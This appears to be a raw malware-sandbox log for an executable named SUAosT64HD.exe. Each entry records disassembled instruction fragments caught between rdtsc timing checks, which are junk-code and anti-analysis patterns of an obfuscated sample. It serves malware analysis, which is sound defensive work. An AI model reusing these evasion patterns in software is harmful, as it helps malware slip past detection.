Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02C9 second address: 54A02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02CD second address: 54A02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edi 0x00000013 pushfd 0x00000014 jmp 00007FC3507E537Ah 0x00000019 adc ah, 00000048h 0x0000001c jmp 00007FC3507E537Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02FB second address: 54A0323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC3C2A3CA86h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0323 second address: 54A032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 513CA5ECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907A3 second address: 54907A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907A7 second address: 54907AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907AB second address: 54907B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907B1 second address: 54907ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 call 00007FC3507E5387h 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907ED second address: 54907F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907F3 second address: 54907F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54907F7 second address: 549081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC350C3E726h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549081C second address: 5490820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490820 second address: 5490826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490826 second address: 549082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549082C second address: 5490830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490830 second address: 5490834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490834 second address: 5490886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FC350C3E71Ah 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FC350C3E720h 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC350C3E71Eh 0x00000021 sub ecx, 571C8D38h 0x00000027 jmp 00007FC350C3E71Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f mov ax, 8905h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490886 second address: 5490909 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC3507E5382h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov ah, F8h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 jmp 00007FC3507E5385h 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC3507E537Ch 0x00000023 xor ax, 0928h 0x00000028 jmp 00007FC3507E537Bh 0x0000002d popfd 0x0000002e mov edx, eax 0x00000030 popad 0x00000031 sub ebx, ebx 0x00000033 pushad 0x00000034 mov dx, 9604h 0x00000038 mov cx, di 0x0000003b popad 0x0000003c test esi, esi 0x0000003e jmp 00007FC3507E537Fh 0x00000043 je 00007FC3C25EAE07h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490909 second address: 549090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 549090D second address: 5490913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490913 second address: 54909C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, CEh 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC350C3E71Dh 0x00000018 and cx, 4956h 0x0000001d jmp 00007FC350C3E721h 0x00000022 popfd 0x00000023 mov ch, AAh 0x00000025 popad 0x00000026 mov ecx, esi 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FC350C3E729h 0x0000002f sbb cx, AD66h 0x00000034 jmp 00007FC350C3E721h 0x00000039 popfd 0x0000003a jmp 00007FC350C3E720h 0x0000003f popad 0x00000040 je 00007FC3C2A44127h 0x00000046 jmp 00007FC350C3E720h 0x0000004b test byte ptr [77326968h], 00000002h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC350C3E727h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54909C8 second address: 54909E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5384h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54909E0 second address: 5490A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC3C2A440DBh 0x00000011 jmp 00007FC350C3E726h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 jmp 00007FC350C3E720h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, ebx 0x00000024 mov si, bx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490A2A second address: 5490AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3507E5380h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FC3507E537Bh 0x0000000f jmp 00007FC3507E5383h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FC3507E5389h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC3507E5383h 0x00000028 add ah, FFFFFF8Eh 0x0000002b jmp 00007FC3507E5389h 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490AB3 second address: 5490ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5490ABB second address: 5490AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FC3507E537Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ecx, 1DA5FE77h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A097B second address: 54A09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6CDA2A0Ah 0x00000008 jmp 00007FC350C3E71Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC350C3E724h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552089D second address: 55208C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208C1 second address: 55208C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208C5 second address: 55208CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208CB second address: 55208F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC350C3E71Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55208F3 second address: 5520908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520908 second address: 5520973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC350C3E71Ch 0x00000011 adc ax, 4538h 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC350C3E728h 0x00000022 and si, BF98h 0x00000027 jmp 00007FC350C3E71Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov si, di 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BB8 second address: 5510BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BBE second address: 5510BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BC2 second address: 5510BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510BCE second address: 5510C01 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC350C3E727h 0x00000008 jmp 00007FC350C3E723h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5510C01 second address: 5510C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC3507E5384h 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007FC3507E537Dh 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0F13 second address: 54A0F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B8A2h 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FC350C3E722h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC350C3E727h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0F68 second address: 54A0F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3507E537Fh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3507E537Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520063 second address: 5520069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5520069 second address: 5520098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC3507E5389h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ecx, 42549645h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552017D second address: 552019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 552019A second address: 55201AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C02D9 second address: 54C0334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC350C3E721h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FC350C3E71Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FC350C3E720h 0x0000001c push FFFFFFFEh 0x0000001e pushad 0x0000001f call 00007FC350C3E71Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0334 second address: 54C0347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 push 2E1EE016h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0347 second address: 54C034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C034B second address: 54C0360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0360 second address: 54C0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0370 second address: 54C03C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4911E002h 0x0000000f pushad 0x00000010 mov si, dx 0x00000013 mov di, 710Ch 0x00000017 popad 0x00000018 call 00007FC3507E5379h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FC3507E5381h 0x00000024 xor si, 47E6h 0x00000029 jmp 00007FC3507E5381h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 mov ecx, 101127EDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C03C2 second address: 54C0401 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC350C3E71Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007FC350C3E726h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0401 second address: 54C0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC3507E537Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0415 second address: 54C0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0428 second address: 54C0520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov edi, 4F3B3A8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov edx, 7A580D66h 0x00000015 pushfd 0x00000016 jmp 00007FC3507E5387h 0x0000001b add eax, 111B17EEh 0x00000021 jmp 00007FC3507E5389h 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, dword ptr fs:[00000000h] 0x0000002e jmp 00007FC3507E537Eh 0x00000033 nop 0x00000034 jmp 00007FC3507E5380h 0x00000039 push eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FC3507E5381h 0x00000041 and ax, 1986h 0x00000046 jmp 00007FC3507E5381h 0x0000004b popfd 0x0000004c push ecx 0x0000004d pushfd 0x0000004e jmp 00007FC3507E5387h 0x00000053 sbb eax, 33FE58BEh 0x00000059 jmp 00007FC3507E5389h 0x0000005e popfd 0x0000005f pop ecx 0x00000060 popad 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007FC3507E5388h 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0520 second address: 54C054D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007FC350C3E71Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C054D second address: 54C0551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0551 second address: 54C056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C056E second address: 54C05B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3507E5387h 0x00000009 and eax, 5028C2EEh 0x0000000f jmp 00007FC3507E5389h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov bx, F27Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C05B6 second address: 54C05D7 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC350C3E725h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, 48157D62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C05D7 second address: 54C061D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC3507E5383h 0x00000008 add ch, 0000005Eh 0x0000000b jmp 00007FC3507E5389h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC3507E537Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C061D second address: 54C0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC350C3E71Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FC350C3E721h 0x00000016 pushfd 0x00000017 jmp 00007FC350C3E720h 0x0000001c adc si, 5718h 0x00000021 jmp 00007FC350C3E71Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 mov ebx, 1B8CF05Ch 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0684 second address: 54C0688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0688 second address: 54C068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C068E second address: 54C0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0694 second address: 54C0717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC350C3E71Ch 0x00000013 adc cx, DBD8h 0x00000018 jmp 00007FC350C3E71Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC350C3E728h 0x00000024 xor cx, 2638h 0x00000029 jmp 00007FC350C3E71Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FC350C3E729h 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0717 second address: 54C071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C071B second address: 54C071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C071F second address: 54C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0725 second address: 54C072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C072B second address: 54C072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
